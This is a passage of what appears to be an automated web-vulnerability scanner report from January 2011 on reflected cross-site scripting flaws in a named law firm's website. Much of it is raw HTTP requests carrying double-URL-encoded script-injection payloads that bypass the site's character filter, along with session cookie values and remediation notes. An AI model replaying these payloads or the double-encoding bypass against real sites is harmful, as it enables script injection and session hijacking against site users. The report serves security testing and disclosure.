GET /css/ui612ba%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8b00486b426/ui.progressbar.css HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:51 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13c9c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4a99b88c02e was submitted in the REST URL parameter 3. This input was echoed as 13c9c"><script>alert(1)</script>4a99b88c02e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui/ui.progressbar.css13c9c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4a99b88c02e HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14fad%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9c0b0ee56be was submitted in the REST URL parameter 1. This input was echoed as 14fad"><script>alert(1)</script>9c0b0ee56be in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css14fad%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9c0b0ee56be/ui/ui.resizable.css HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:15 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fcda%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8c138520eda was submitted in the REST URL parameter 2. This input was echoed as 3fcda"><script>alert(1)</script>8c138520eda in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui3fcda%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8c138520eda/ui.resizable.css HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:16 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f779c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e382088a8c20 was submitted in the REST URL parameter 3. This input was echoed as f779c"><script>alert(1)</script>382088a8c20 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui/ui.resizable.cssf779c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e382088a8c20 HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:17 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2d5f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e87253ed8d10 was submitted in the REST URL parameter 1. This input was echoed as c2d5f"><script>alert(1)</script>87253ed8d10 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /cssc2d5f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e87253ed8d10/ui/ui.slider.css HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:42 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d474%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1e1c925c625 was submitted in the REST URL parameter 2. This input was echoed as 7d474"><script>alert(1)</script>1e1c925c625 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui7d474%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1e1c925c625/ui.slider.css HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:43 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb3ab%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ede52d4ea844 was submitted in the REST URL parameter 3. This input was echoed as eb3ab"><script>alert(1)</script>de52d4ea844 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui/ui.slider.csseb3ab%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ede52d4ea844 HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:44 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5847%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e63b9f9dcf48 was submitted in the REST URL parameter 1. This input was echoed as e5847"><script>alert(1)</script>63b9f9dcf48 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /csse5847%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e63b9f9dcf48/ui/ui.tabs.css HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:44 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81a0d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eee949bf1e89 was submitted in the REST URL parameter 2. This input was echoed as 81a0d"><script>alert(1)</script>ee949bf1e89 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui81a0d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eee949bf1e89/ui.tabs.css HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:45 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b92b8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e93dc2b44d56 was submitted in the REST URL parameter 3. This input was echoed as b92b8"><script>alert(1)</script>93dc2b44d56 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui/ui.tabs.cssb92b8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e93dc2b44d56 HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:46 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8b59%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb748a2e0a4d was submitted in the REST URL parameter 1. This input was echoed as f8b59"><script>alert(1)</script>b748a2e0a4d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /cssf8b59%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb748a2e0a4d/ui/ui.theme.css HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:20 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f482%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5de43e0d372 was submitted in the REST URL parameter 2. This input was echoed as 9f482"><script>alert(1)</script>5de43e0d372 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui9f482%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5de43e0d372/ui.theme.css HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:21 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20285%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9291800f59c was submitted in the REST URL parameter 3. This input was echoed as 20285"><script>alert(1)</script>9291800f59c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui/ui.theme.css20285%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9291800f59c HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:21 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30fea%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e818c7828cb8 was submitted in the REST URL parameter 1. This input was echoed as 30fea"><script>alert(1)</script>818c7828cb8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /index.cfm30fea%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e818c7828cb8 HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:13:41 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
2.99. http://www.wileyrein.com/index.cfm [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.wileyrein.com
Path:
/index.cfm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7f23"><script>alert(1)</script>472c4d98eb6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.cfm?e7f23"><script>alert(1)</script>472c4d98eb6=1 HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:13:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d732e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3c700324221 was submitted in the REST URL parameter 1. This input was echoed as d732e"><script>alert(1)</script>3c700324221 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /jsd732e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3c700324221/jq.equalheights.js HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:14:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f70d5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0445fb7d91b was submitted in the REST URL parameter 2. This input was echoed as f70d5"><script>alert(1)</script>0445fb7d91b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /js/jq.equalheights.jsf70d5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0445fb7d91b HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:14:03 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67315%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e635a97b6d45 was submitted in the REST URL parameter 1. This input was echoed as 67315"><script>alert(1)</script>635a97b6d45 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /js67315%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e635a97b6d45/jquery.js HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:13:32 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
